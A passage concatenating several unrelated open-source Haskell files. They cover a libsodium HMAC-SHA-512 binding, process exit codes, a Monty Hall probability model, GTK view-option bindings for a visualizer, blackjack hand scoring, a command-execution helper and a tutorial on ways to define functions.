  c_crypto_auth_hmacsha512_keybytes :: CInt
foreign import ccall unsafe "crypto_auth_hmacsha512"
  c_crypto_auth_hmacsha512 :: A.AuthFn
foreign import ccall unsafe "crypto_auth_hmacsha512_verify"
  c_crypto_auth_hmacsha512_verify :: A.VerifyFn
-- Phantom tag distinguishing HMAC-SHA-512 keys/tags from other algorithms'.
data HmacSha512
type Key = A.Key HmacSha512
type Tag = A.Tag HmacSha512
-- | Algorithm record bundling the four C entry points.
hmacSha512 :: A.Auth HmacSha512
hmacSha512 = A.mkAuth c_crypto_auth_hmacsha512_keybytes c_crypto_auth_hmacsha512_bytes
                      c_crypto_auth_hmacsha512 c_crypto_auth_hmacsha512_verify
-- RecordWildCards pattern binding: exposes the record's fields
-- (keyBytes, tagBytes, authenticate, verify, ...) as top-level names.
A.Auth {..} = hmacSha512
| dnaq/crypto-sodium | src/Crypto/Sodium/Auth/HmacSha512.hs | mit | 2,028 | 0 | 6 | 485 | 224 | 143 | 81 | -1 | -1 |
{- |
Description : standard process exit codes
Copyright : (c) Martyn J. Pearce 2014, 2015
License : BSD
Maintainer : haskell@sixears.com
standard process exit codes
-}
module Fluffy.Sys.Exit
( Die
, die, dieInternal, dieParse, exit, exExit
, eUsage, eUtility
, exitAbnormal, exitIORead, exitUsage, exitUtility
, handleDie
)
where
-- base --------------------------------
import Data.Word ( Word8 )
import Control.Exception ( Exception )
import System.Exit ( ExitCode( ExitFailure )
, exitSuccess, exitWith
)
-- exceptions --------------------------
import Control.Monad.Catch ( MonadThrow, handle, throwM )
-- Fluffy ------------------------------
import Fluffy.Sys.IO ( warn )
--------------------------------------------------------------------------------
-- exit --------------------------------
-- | akin to C's exit(int); terminate the process with the given value
-- (0 maps to 'exitSuccess').
exit :: Word8 -> IO a
exit code
  | code == 0 = exitSuccess
  | otherwise = exitWith (ExitFailure (fromEnum code))
-- exitAbnormal ------------------------
-- | exit; all worked, but got an unusual conclusion (e.g., grep found nothing)
exitAbnormal :: IO a
exitAbnormal = exit 1
-- exitUtility -------------------------
-- | Exit code for utility invocations (e.g., --help).
eUtility :: Word8
eUtility = 3
-- | exit; because a utility function (e.g., --help) was invoked
exitUtility :: IO a
exitUtility = exit eUtility
-- exitUsage ---------------------------
-- | Exit code for a user error invoking the program.
eUsage :: Word8
eUsage = 2
-- | exit; due to a user error invoking the program
exitUsage :: IO a
exitUsage = exit eUsage
-- exitIORead --------------------------
-- | exit; due to an IO read failure
exitIORead :: IO a
exitIORead = exit 4
-- exitParse ---------------------------
-- | Exit code for a parse failure (used by 'dieParse').
eParse :: Word8
eParse = 5
-- exitInternal ------------------------
-- | Exit code for internal errors (used by 'dieInternal').
eInternal :: Word8
eInternal = 254
-- Die -------------------------------------------------------------------------
-- | Exception carrying a process exit code and a message to print.
data Die = Die Word8 String
-- 'show' yields only the message; the code is consumed by 'handleDie'.
instance Show Die where
  show (Die _ s) = s
instance Exception Die
-- die ---------------------------------
-- | Throw a 'Die' with the given exit code and message (any 'MonadThrow').
die :: MonadThrow m => Word8 -> String -> m a
die i s = throwM (Die i s)
-- | 'die' with the parse-failure exit code ('eParse').
dieParse :: MonadThrow m => String -> m a
dieParse = die eParse
-- | 'die' with the internal-error exit code ('eInternal').
dieInternal :: MonadThrow m => String -> m a
dieInternal = die eInternal
-- handleDie ---------------------------
-- | place this at the head of main to exit from Die throws, e.g.,
--
-- > main = handleDie $ do
-- >   ...
--
-- A caught 'Die' prints its message to stderr and exits with its code.
handleDie :: IO () -> IO ()
handleDie = handle h
  where h (Die i s) = exExit i s
-- exExit ------------------------------
-- | exit with an error message and a defined exit code
exExit :: Word8 -> String -> IO a
exExit code msg = do
    warn msg
    exit code
| sixears/fluffy | src/Fluffy/Sys/Exit.hs | mit | 2,715 | 0 | 9 | 548 | 513 | 287 | 226 | 46 | 1 |
module MontyHall where
import Probability hiding (choose)
--import ListUtils (replicate)
import List ( (\\) )
import Monad (liftM)
data Door = A | B | C
deriving (Eq,Ord,Show)
doors :: [Door]
doors = [A,B,C]
data State = Doors {prize :: Door, chosen :: Door, opened :: Door}
deriving (Eq,Ord,Show)
-- initial configuration of the game status
--
start :: State
-- all three doors undefined: each field is set by a later game step
-- before it is ever inspected
start = Doors {prize=u,chosen=u,opened=u} where u=undefined
-- Steps of the game:
--
-- (1) hide the prize
-- (2) choose a door
-- (3) open a non-open door, not revealing the prize
-- (4) apply strategy: switch or stay
--
hide :: Trans State
hide s = uniform [s {prize = d} | d <- doors]
choose :: Trans State
choose s = uniform [s {chosen = d} | d <- doors]
-- host opens uniformly among doors that are neither chosen nor winning
open :: Trans State
open s = uniform [s {opened = d} | d <- doors \\ [prize s,chosen s]]
type Strategy = Trans State
-- switch to a door that is neither currently chosen nor open
switch :: Strategy
switch s = uniform [s {chosen = d} | d <- doors \\ [chosen s,opened s]]
stay :: Strategy
stay = idT
-- | Run all four steps with the given final strategy.
game :: Strategy -> Trans State
game s = sequ [hide,choose,open,s]
-- Playing the game
--
data Outcome = Win | Lose
               deriving (Eq,Ord,Show)
-- | Judge a final state: the player wins iff the chosen door hides the prize.
result :: State -> Outcome
result s
  | chosen s == prize s = Win
  | otherwise           = Lose
-- | Exact outcome distribution of playing with the given strategy.
eval :: Strategy -> Dist Outcome
eval s = mapD result (game s start)
-- | Sampled outcome distribution from k random plays of the strategy.
simEval :: Int -> Strategy -> RDist Outcome
simEval k s = mapD result `fmap` (k ~. game s) start
-- Alternative modeling
--
-- The initial pick wins 1 in 3: one winning door, two losing ones.
firstChoice :: Dist Outcome
firstChoice = uniform [Win,Lose,Lose]
-- | Switching flips the outcome: a first-choice win becomes a loss and
-- vice versa.
switch' :: Trans Outcome
switch' outcome =
    certainly $ case outcome of
      Win  -> Lose
      Lose -> Win
| vbalalla/financial_contract_language | pfp-jun06/MontyHall.hs | mit | 1,584 | 0 | 11 | 352 | 605 | 338 | 267 | 38 | 2 |
-----------------------------------------------------------------------------
--
-- Module : ViewOptions
-- Copyright :
-- License : MIT
--
-- Maintainer : Tobias Fuchs
-- Stability : experimental
-- Portability : Win32, POSIX
--
-- |
--
-----------------------------------------------------------------------------
{-# OPTIONS -O2 -Wall #-}
module Drool.UI.ViewOptions (
initComponent, updateSettings
) where
import Data.IORef
import qualified Graphics.UI.Gtk as Gtk
import qualified Graphics.UI.Gtk.Builder as GtkBuilder
import Graphics.Rendering.OpenGL
import qualified Drool.Types as DT
import qualified Drool.ApplicationContext as AC
import qualified Drool.ContextObjects as AC
import qualified Drool.UI.GtkHelpers as GH
import qualified Drool.UI.Dialogs.FFTSurfaceDialog as FFTSurfaceDialog
import qualified Drool.UI.Visuals as Visuals
-- Initializes GUI component for view options.
-- Expects a GtkBuilder instance and default context settings.
initComponent :: GtkBuilder.Builder -> IORef AC.ContextSettings -> IORef AC.ContextObjects -> IO Bool
initComponent gtkBuilder contextSettings contextObjects = do
putStrLn "Initializing ViewOptions component"
defaultSettings <- readIORef contextSettings
button_view_perspectiveTop <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToButton "buttonPerspectiveTop"
_ <- Gtk.onClicked button_view_perspectiveTop $ do
settings <- readIORef contextSettings
contextSettings $=! settings { AC.renderPerspective = DT.Top }
button_view_perspectiveFront <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToButton "buttonPerspectiveFront"
_ <- Gtk.onClicked button_view_perspectiveFront $ do
settings <- readIORef contextSettings
contextSettings $=! settings { AC.renderPerspective = DT.Front }
button_view_perspectiveSide <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToButton "buttonPerspectiveSide"
_ <- Gtk.onClicked button_view_perspectiveSide $ do
settings <- readIORef contextSettings
contextSettings $=! settings { AC.renderPerspective = DT.Side }
button_view_perspectiveIso <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToButton "buttonPerspectiveIsometric"
_ <- Gtk.onClicked button_view_perspectiveIso $ do
settings <- readIORef contextSettings
contextSettings $=! settings { AC.renderPerspective = DT.Isometric }
scale_view_linScalingAdj <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjLinearScaling"
_ <- Gtk.onValueChanged scale_view_linScalingAdj $ do
val <- Gtk.adjustmentGetValue scale_view_linScalingAdj
settings <- readIORef contextSettings
contextSettings $=! settings { AC.scaling = (realToFrac(val)::Float) }
adjFixedRotationX <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjFixedRotationX"
_ <- Gtk.onValueChanged adjFixedRotationX $ do
val <- Gtk.adjustmentGetValue adjFixedRotationX
settings <- readIORef contextSettings
let cRotation = AC.fixedRotation settings
contextSettings $=! settings { AC.fixedRotation = cRotation { DT.rotX = (realToFrac(val)::GLfloat) } }
adjFixedRotationY <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjFixedRotationY"
_ <- Gtk.onValueChanged adjFixedRotationY $ do
val <- Gtk.adjustmentGetValue adjFixedRotationY
settings <- readIORef contextSettings
let cRotation = AC.fixedRotation settings
contextSettings $=! settings { AC.fixedRotation = cRotation { DT.rotY = (realToFrac(val)::GLfloat) } }
adjFixedRotationZ <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjFixedRotationZ"
_ <- Gtk.onValueChanged adjFixedRotationZ $ do
val <- Gtk.adjustmentGetValue adjFixedRotationZ
settings <- readIORef contextSettings
let cRotation = AC.fixedRotation settings
contextSettings $=! settings { AC.fixedRotation = cRotation { DT.rotZ = (realToFrac(val)::GLfloat) } }
adjIncRotationX <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjIncRotationX"
_ <- Gtk.onValueChanged adjIncRotationX $ do
val <- Gtk.adjustmentGetValue adjIncRotationX
settings <- readIORef contextSettings
let cRotation = AC.incRotation settings
contextSettings $=! settings { AC.incRotation = cRotation { DT.rotX = (realToFrac(val)::GLfloat) } }
adjIncRotationY <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjIncRotationY"
_ <- Gtk.onValueChanged adjIncRotationY $ do
val <- Gtk.adjustmentGetValue adjIncRotationY
settings <- readIORef contextSettings
let cRotation = AC.incRotation settings
contextSettings $=! settings { AC.incRotation = cRotation { DT.rotY = (realToFrac(val)::GLfloat) } }
adjIncRotationZ <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjIncRotationZ"
_ <- Gtk.onValueChanged adjIncRotationZ $ do
val <- Gtk.adjustmentGetValue adjIncRotationZ
settings <- readIORef contextSettings
let cRotation = AC.incRotation settings
contextSettings $=! settings { AC.incRotation = cRotation { DT.rotZ = (realToFrac(val)::GLfloat) } }
adjBandRange1Amp <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjBandRange1Amp"
_ <- Gtk.onValueChanged adjBandRange1Amp $ do
settings <- readIORef contextSettings
dVal <- Gtk.adjustmentGetValue adjBandRange1Amp
let fVal = realToFrac dVal
let cAmps = AC.rangeAmps settings
let mAmps = fVal : (drop 1 cAmps)
contextSettings $=! settings { AC.rangeAmps = mAmps }
adjBandRange2Amp <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjBandRange2Amp"
_ <- Gtk.onValueChanged adjBandRange2Amp $ do
settings <- readIORef contextSettings
dVal <- Gtk.adjustmentGetValue adjBandRange2Amp
let fVal = realToFrac dVal
let cAmps = AC.rangeAmps settings
let mAmps = take 1 cAmps ++ (fVal : (drop 2 cAmps))
contextSettings $=! settings { AC.rangeAmps = mAmps }
adjBandRange3Amp <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjBandRange3Amp"
_ <- Gtk.onValueChanged adjBandRange3Amp $ do
settings <- readIORef contextSettings
dVal <- Gtk.adjustmentGetValue adjBandRange3Amp
let fVal = realToFrac dVal
let cAmps = AC.rangeAmps settings
let mAmps = take 2 cAmps ++ (fVal : (drop 3 cAmps))
contextSettings $=! settings { AC.rangeAmps = mAmps }
adjBandRange4Amp <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjBandRange4Amp"
_ <- Gtk.onValueChanged adjBandRange4Amp $ do
settings <- readIORef contextSettings
dVal <- Gtk.adjustmentGetValue adjBandRange4Amp
let fVal = realToFrac dVal
let cAmps = AC.rangeAmps settings
let mAmps = take 3 cAmps ++ (fVal : (drop 4 cAmps))
contextSettings $=! settings { AC.rangeAmps = mAmps }
adjBandRange5Amp <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjBandRange5Amp"
_ <- Gtk.onValueChanged adjBandRange5Amp $ do
settings <- readIORef contextSettings
dVal <- Gtk.adjustmentGetValue adjBandRange5Amp
let fVal = realToFrac dVal
let cAmps = AC.rangeAmps settings
let mAmps = take 4 cAmps ++ [fVal]
contextSettings $=! settings { AC.rangeAmps = mAmps }
comboboxBlendingSource <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToComboBox "comboboxBlendingSource"
Gtk.comboBoxSetActive comboboxBlendingSource 4
_ <- Gtk.on comboboxBlendingSource Gtk.changed $ do
settings <- readIORef contextSettings
modeIdx <- Gtk.comboBoxGetActive comboboxBlendingSource
contextSettings $=! settings { AC.blendModeSourceIdx = modeIdx }
comboboxBlendingFrameBuffer <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToComboBox "comboboxBlendingFrameBuffer"
Gtk.comboBoxSetActive comboboxBlendingFrameBuffer 6
_ <- Gtk.on comboboxBlendingFrameBuffer Gtk.changed $ do
settings <- readIORef contextSettings
modeIdx <- Gtk.comboBoxGetActive comboboxBlendingFrameBuffer
contextSettings $=! settings { AC.blendModeFrameBufferIdx = modeIdx }
comboboxFeatureBassEnergyTarget <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToComboBox "comboboxFeatureBassEnergyTarget"
_ <- Gtk.on comboboxFeatureBassEnergyTarget Gtk.changed $ do
settings <- readIORef contextSettings
targetIdx <- Gtk.comboBoxGetActive comboboxFeatureBassEnergyTarget
contextSettings $=! settings { AC.featureBassEnergyTargetIdx = targetIdx }
comboboxFeatureSignalEnergyTarget <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToComboBox "comboboxFeatureSignalEnergyTarget"
_ <- Gtk.on comboboxFeatureSignalEnergyTarget Gtk.changed $ do
settings <- readIORef contextSettings
targetIdx <- Gtk.comboBoxGetActive comboboxFeatureSignalEnergyTarget
contextSettings $=! settings { AC.featureSignalEnergyTargetIdx = targetIdx }
adjFeatureSignalEnergySurfaceCoeff <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjFeatureSignalEnergySurfaceCoeff"
_ <- Gtk.onValueChanged adjFeatureSignalEnergySurfaceCoeff $ do
settings <- readIORef contextSettings
val <- Gtk.adjustmentGetValue adjFeatureSignalEnergySurfaceCoeff
contextSettings $=! settings { AC.featureSignalEnergySurfaceCoeff = realToFrac val }
adjFeatureSignalEnergyGridCoeff <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjFeatureSignalEnergyGridCoeff"
_ <- Gtk.onValueChanged adjFeatureSignalEnergyGridCoeff $ do
settings <- readIORef contextSettings
val <- Gtk.adjustmentGetValue adjFeatureSignalEnergyGridCoeff
contextSettings $=! settings { AC.featureSignalEnergyGridCoeff = realToFrac val }
adjFeatureBassEnergySurfaceCoeff <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjFeatureBassEnergySurfaceCoeff"
_ <- Gtk.onValueChanged adjFeatureBassEnergySurfaceCoeff $ do
settings <- readIORef contextSettings
val <- Gtk.adjustmentGetValue adjFeatureBassEnergySurfaceCoeff
contextSettings $=! settings { AC.featureBassEnergySurfaceCoeff = realToFrac val }
adjFeatureBassEnergyGridCoeff <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjFeatureBassEnergyGridCoeff"
_ <- Gtk.onValueChanged adjFeatureBassEnergyGridCoeff $ do
settings <- readIORef contextSettings
val <- Gtk.adjustmentGetValue adjFeatureBassEnergyGridCoeff
contextSettings $=! settings { AC.featureBassEnergyGridCoeff = realToFrac val }
buttonSetMarquee <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToButton "buttonSetMarquee"
entryMarquee <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToEntry "entryMarqueeText"
_ <- Gtk.onClicked buttonSetMarquee $ do
marqueeText <- Gtk.entryGetText entryMarquee
settings <- readIORef contextSettings
contextSettings $=! settings { AC.marqueeText = marqueeText }
_ <- Gtk.afterEntryActivate entryMarquee $ do
marqueeText <- Gtk.entryGetText entryMarquee
settings <- readIORef contextSettings
contextSettings $=! settings { AC.marqueeText = marqueeText }
buttonToggleAutoPerspectiveSwitch <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToToggleButton "buttonToggleAutoPerspectiveSwitch"
_ <- Gtk.onToggled buttonToggleAutoPerspectiveSwitch $ do
state <- Gtk.toggleButtonGetActive buttonToggleAutoPerspectiveSwitch
settings <- readIORef contextSettings
contextSettings $=! settings { AC.autoPerspectiveSwitch = state }
GH.bindAdjustment "adjAutoPerspectiveSwitchInterval" gtkBuilder contextSettings (\v settings -> settings { AC.autoPerspectiveSwitchInterval = round v })
GH.bindAdjustment "adjViewAngle" gtkBuilder contextSettings (\v settings -> settings { AC.viewAngle = realToFrac v })
GH.bindAdjustment "adjViewDistance" gtkBuilder contextSettings (\v settings -> settings { AC.viewDistance = realToFrac v })
GH.bindAdjustment "adjXLinScale" gtkBuilder contextSettings (\v settings -> settings { AC.xLinScale = realToFrac v })
GH.bindAdjustment "adjXLogScale" gtkBuilder contextSettings (\v settings -> settings { AC.xLogScale = realToFrac v })
GH.bindAdjustment "adjZLinScale" gtkBuilder contextSettings (\v settings -> settings { AC.zLinScale = realToFrac v })
GH.bindCheckButton "checkbuttonPlayback" gtkBuilder contextSettings (\v settings -> settings { AC.playbackEnabled = v })
GH.bindCheckButton "checkbuttonReverseBuffer" gtkBuilder contextSettings (\v settings -> settings { AC.reverseBuffer = v })
-- Lights
GH.bindCheckButton "checkbuttonLight1Enabled" gtkBuilder contextSettings (\v settings -> settings { AC.light0 = (AC.light0 settings) { AC.lightState = if v then Enabled else Disabled } })
GH.bindColorButton "colorbuttonLight1Ambient" gtkBuilder contextSettings (\c s -> s { AC.light0 = (AC.light0 s) { AC.lightAmbient = c } } )
GH.bindColorButton "colorbuttonLight1Diffuse" gtkBuilder contextSettings (\c s -> s { AC.light0 = (AC.light0 s) { AC.lightDiffuse = c } } )
GH.bindColorButton "colorbuttonLight1Specular" gtkBuilder contextSettings (\c s -> s { AC.light0 = (AC.light0 s) { AC.lightSpecular = c } } )
GH.bindCheckButton "checkbuttonLight2Enabled" gtkBuilder contextSettings (\v settings -> settings { AC.light1 = (AC.light1 settings) { AC.lightState = if v then Enabled else Disabled } })
GH.bindColorButton "colorbuttonLight2Ambient" gtkBuilder contextSettings (\c s -> s { AC.light1 = (AC.light1 s) { AC.lightAmbient = c } } )
GH.bindColorButton "colorbuttonLight2Diffuse" gtkBuilder contextSettings (\c s -> s { AC.light1 = (AC.light1 s) { AC.lightDiffuse = c } } )
GH.bindColorButton "colorbuttonLight2Specular" gtkBuilder contextSettings (\c s -> s { AC.light1 = (AC.light1 s) { AC.lightSpecular = c } } )
GH.bindButton "buttonVisualModelEdit" gtkBuilder contextSettings ( \_ -> do _ <- FFTSurfaceDialog.initComponent gtkBuilder
contextSettings
contextObjects
return () )
return True
-- | Push the values of a (typically freshly loaded) 'AC.ContextSettings'
-- into the corresponding GTK widgets so the UI reflects those settings.
-- Always returns True (kept for interface compatibility with callers).
updateSettings :: GtkBuilder.Builder -> AC.ContextSettings -> IO Bool
updateSettings gtkBuilder settings = do
  GH.initAdjustment "adjLinearScaling" gtkBuilder (realToFrac $ AC.scaling settings)
  GH.initAdjustment "adjFixedRotationX" gtkBuilder (realToFrac $ DT.rotX $ AC.fixedRotation settings)
  GH.initAdjustment "adjFixedRotationY" gtkBuilder (realToFrac $ DT.rotY $ AC.fixedRotation settings)
  GH.initAdjustment "adjFixedRotationZ" gtkBuilder (realToFrac $ DT.rotZ $ AC.fixedRotation settings)
  GH.initAdjustment "adjIncRotationX" gtkBuilder (realToFrac $ DT.rotX $ AC.incRotation settings)
  GH.initAdjustment "adjIncRotationY" gtkBuilder (realToFrac $ DT.rotY $ AC.incRotation settings)
  GH.initAdjustment "adjIncRotationZ" gtkBuilder (realToFrac $ DT.rotZ $ AC.incRotation settings)
  -- NOTE(review): '!!' assumes rangeAmps always holds >= 5 entries — confirm.
  GH.initAdjustment "adjBandRange1Amp" gtkBuilder (realToFrac $ (AC.rangeAmps settings) !! 0)
  GH.initAdjustment "adjBandRange2Amp" gtkBuilder (realToFrac $ (AC.rangeAmps settings) !! 1)
  GH.initAdjustment "adjBandRange3Amp" gtkBuilder (realToFrac $ (AC.rangeAmps settings) !! 2)
  GH.initAdjustment "adjBandRange4Amp" gtkBuilder (realToFrac $ (AC.rangeAmps settings) !! 3)
  GH.initAdjustment "adjBandRange5Amp" gtkBuilder (realToFrac $ (AC.rangeAmps settings) !! 4)
  GH.initCheckButton "checkbuttonPlayback" gtkBuilder (AC.playbackEnabled settings)
  comboboxFeatureBassEnergyTarget <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToComboBox "comboboxFeatureBassEnergyTarget"
  Gtk.comboBoxSetActive comboboxFeatureBassEnergyTarget (AC.featureBassEnergyTargetIdx settings)
  comboboxFeatureSignalEnergyTarget <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToComboBox "comboboxFeatureSignalEnergyTarget"
  Gtk.comboBoxSetActive comboboxFeatureSignalEnergyTarget (AC.featureSignalEnergyTargetIdx settings)
  adjFeatureBassEnergyGridCoeff <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjFeatureBassEnergyGridCoeff"
  Gtk.adjustmentSetValue adjFeatureBassEnergyGridCoeff (realToFrac $ AC.featureBassEnergyGridCoeff settings)
  adjFeatureSignalEnergyGridCoeff <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjFeatureSignalEnergyGridCoeff"
  Gtk.adjustmentSetValue adjFeatureSignalEnergyGridCoeff (realToFrac $ AC.featureSignalEnergyGridCoeff settings)
  adjFeatureBassEnergySurfaceCoeff <- GtkBuilder.builderGetObject gtkBuilder Gtk.castToAdjustment "adjFeatureBassEnergySurfaceCoeff"
  Gtk.adjustmentSetValue adjFeatureBassEnergySurfaceCoeff (realToFrac $ AC.featureBassEnergySurfaceCoeff settings)
  GH.initAdjustment "adjFeatureSignalEnergySurfaceCoeff" gtkBuilder (realToFrac $ AC.featureSignalEnergySurfaceCoeff settings)
  GH.initAdjustment "adjAutoPerspectiveSwitchInterval" gtkBuilder (realToFrac $ AC.autoPerspectiveSwitchInterval settings)
  -- Light 1 ('if c then True else False' simplified to the condition).
  GH.initCheckButton "checkbuttonLight1Enabled" gtkBuilder (AC.lightState (AC.light0 settings) == Enabled)
  GH.initColorButton "colorbuttonLight1Ambient" gtkBuilder (AC.lightAmbient $ AC.light0 settings)
  GH.initColorButton "colorbuttonLight1Diffuse" gtkBuilder (AC.lightDiffuse $ AC.light0 settings)
  GH.initColorButton "colorbuttonLight1Specular" gtkBuilder (AC.lightSpecular $ AC.light0 settings)
  -- BUG FIX: this previously wrote to widget id "checkbuttonLight1Enabled"
  -- (copy/paste), so Light 2's enabled state was never restored into its
  -- own checkbox ("checkbuttonLight2Enabled" is the id bound in
  -- initComponent).
  GH.initCheckButton "checkbuttonLight2Enabled" gtkBuilder (AC.lightState (AC.light1 settings) == Enabled)
  GH.initColorButton "colorbuttonLight2Ambient" gtkBuilder (AC.lightAmbient $ AC.light1 settings)
  GH.initColorButton "colorbuttonLight2Diffuse" gtkBuilder (AC.lightDiffuse $ AC.light1 settings)
  GH.initColorButton "colorbuttonLight2Specular" gtkBuilder (AC.lightSpecular $ AC.light1 settings)
  return True
| fuchsto/drool | src/Drool/UI/ViewOptions.hs | mit | 17,814 | 0 | 18 | 2,707 | 4,317 | 2,078 | 2,239 | 228 | 3 |
-- | Umbrella module: re-exports the public API of the eventful-core
-- sub-modules under a single import.
module Eventful
  ( module X
  ) where
import Eventful.CommandHandler as X
import Eventful.EventBus as X
import Eventful.Projection as X
import Eventful.ProjectionCache.Types as X
import Eventful.ProcessManager as X
import Eventful.ReadModel.Class as X
import Eventful.Serializer as X
import Eventful.Store.Class as X
import Eventful.UUID as X
| jdreaver/eventful | eventful-core/src/Eventful.hs | mit | 345 | 0 | 4 | 48 | 76 | 55 | 21 | 11 | 0 |
module Cards.Blackjack(
computeHandValue,
Hand,
DeckOfCards,
HandScore(Score),
newHand,
blackjackDeck
)
where
import Cards.PlayingCards
import Data.Maybe
-- | A hand is just an ordered list of cards.
type Hand = [Card]
-- | Outcome of scoring a hand. The derived 'Ord' gives
-- Bust < Score _ < BlackJack, so a natural blackjack beats any plain
-- score and a bust loses to everything.
data HandScore = Bust | Score Int | BlackJack deriving (Ord, Show, Eq)
-- | Start a fresh, empty hand; the deck is passed through untouched.
newHand :: DeckOfCards -> (Hand, DeckOfCards)
newHand d = ([], d)
-- | Blackjack uses the standard deck from Cards.PlayingCards.
blackjackDeck :: DeckOfCards
blackjackDeck = deckOfCards
-- | True exactly for a two-card hand of an ace plus a royal card.
-- NOTE(review): 'value' and 'isRoyal' come from Cards.PlayingCards;
-- presumably 'value Ace c' tests whether c is an ace -- confirm there.
isBlackjack :: Hand -> Bool
isBlackjack (c1:c2:[]) = (value Ace c1 && isRoyal c2) || (value Ace c2 && isRoyal c1)
isBlackjack _ = False
-- | Score a hand: a natural blackjack wins outright; otherwise take the
-- best total over all ace valuations (see 'computeHandValue'' and
-- 'getHandScore').
computeHandValue :: Hand -> HandScore
computeHandValue h = if isBlackjack h then BlackJack else getHandScore $ computeHandValue' h
-- | All possible totals for a hand: the cartesian sum of every card's
-- candidate values (an ace contributes both 1 and 11, so a hand with k
-- aces yields up to 2^k totals).
computeHandValue' :: Hand -> [Int]
computeHandValue' = foldr combine [0]
  where
    -- Extend every partial total by every value the next card can take.
    combine card totals = [v + t | v <- cardValue card, t <- totals]
-- | Pick the best candidate total that does not exceed 21; if every
-- candidate busts, the hand is 'Bust'. No candidates at all scores zero.
getHandScore :: [Int] -> HandScore
getHandScore [] = Score 0
getHandScore totals =
  case filter (<= 21) totals of
    []   -> Bust
    kept -> Score (maximum kept)
-- | Candidate pip values for one card: an ace is worth 1 or 11; ranks
-- Two..Ten map to 2..10; Jack, Queen, King all map to 10 (the zip pairs
-- [Two .. King] with [2..10] followed by a constant 10).
cardValue :: Card -> [Int]
cardValue (Card _ Ace) = [1, 11]
cardValue (Card _ x) = maybeToList $ lookup x $ zip [Two .. King] ([2..10] ++ repeat 10)
| smobs/HackJack | Cards/Blackjack.hs | mit | 1,147 | 0 | 11 | 201 | 475 | 257 | 218 | 34 | 2 |
-- |
--
-- Module : Exec
-- Description : Executes 'Command's.
-- License : MIT
--
-- Executes 'Command's.
--
module Exec ( execCommand, execConfigs ) where
import ExecConfig
import System.Process
-----------------------------------------------------------------------------
-- | Execute a 'Command': announce the shell line on stdout, then run it
-- via 'callCommand' (which throws on a non-zero exit code).
execCommand :: Command -> IO()
execCommand (Cmd cmd) =
  putStrLn ("Executing: " ++ cmd) >> callCommand cmd
-- | Execute the 'Command's built from the given configs, creating the
-- log directory first (shells out to @mkdir -p@, so POSIX-only).
execConfigs :: [ExecConfig] -> [ExecParams] -> DataConfig -> IO ()
execConfigs configs params dataCfg = do
  callCommand ("mkdir -p " ++ logDir dataCfg)
  mapM_ execCommand (createCommands configs params dataCfg)
| fehu/min-dat--data-mining-arff | src/Exec.hs | mit | 670 | 0 | 9 | 132 | 147 | 79 | 68 | 11 | 1 |
module CreatingFunctions where
import Data.List(sortBy,groupBy)
import Data.Array(array,(!))
-- By definition at top level
plus5 x = x + 5
-- NOTE(review): 'last' and 'inits' shadow Prelude/Data.List names; any
-- unqualified use elsewhere in this module would be ambiguous.
-- Last element via double reversal (partial: errors on []).
last x = head(reverse x)
-- Drops the final element (partial on []); despite the name this is
-- Prelude's 'init', not Data.List's 'inits'.
inits = (reverse . tail . reverse)
-- By cases
-- Absolute value, with both orderings spelled out as guards.
absolute n
  | n < 0 = -n
  | n >= 0 = n
-- Order a pair ascending; the three possible orderings are explicit.
swap (a, b)
  | a < b = (a, b)
  | a > b = (b, a)
  | a == b = (a, b)
-- Same contract as 'swap', collapsed to a single test.
swap2 (a, b)
  | b < a = (b, a)
  | otherwise = (a, b)
-- True exactly when the first two arguments sum to the third.
f a b c = a + b == c
-- By pattern matching
-- Conjunction by pattern matching: a True first argument passes the
-- second through; a False one still forces it (as the original did).
myand True b = b
myand False False = False
myand False True = False
-- Same truth table with a catch-all second clause.
myand2 True True = True
myand2 _ _ = False
-- By use of a library function
smallest = minimum [3,7,34,1]
-- By local definition using where (a descending comparator)
ordered = sortBy backwards [1,76,2,5,9,45]
  where backwards a b = compare b a
-- By lambda expression
descending = sortBy (\a b -> compare b a) [1,76,2,5,9,45]
-- Group adjacent pairs whose second components are equal
bySnd = groupBy (\(_, a) (_, b) -> a == b) [(1,'a'),(3,'a'),(2,'c')]
-- By parenthesizing a binary operator: 1 + (2 + (3 + 0))
six :: Integer
six = foldr (+) 0 [1,2,3]
-- By operator section
add5ToAll = map (+5) [2,3,6,1]
-- By partial application
hasFour = any (==4)
doubleEach = map (\n -> n + n)
-- By composition
hasTwo = hasFour . doubleEach
empty = (==0) . length
-- By combinator (a higher-order function): the K combinator
k x = \_ -> x
all3s = map (k 3) [1,2,3]
-- By indexing into data (0-based; out of range raises an error)
whatDay d = ["Sun","Mon","Tue","Wed","Thu","Fri","Sat"] !! d
-- By lookup in an immutable array (1-based indices)
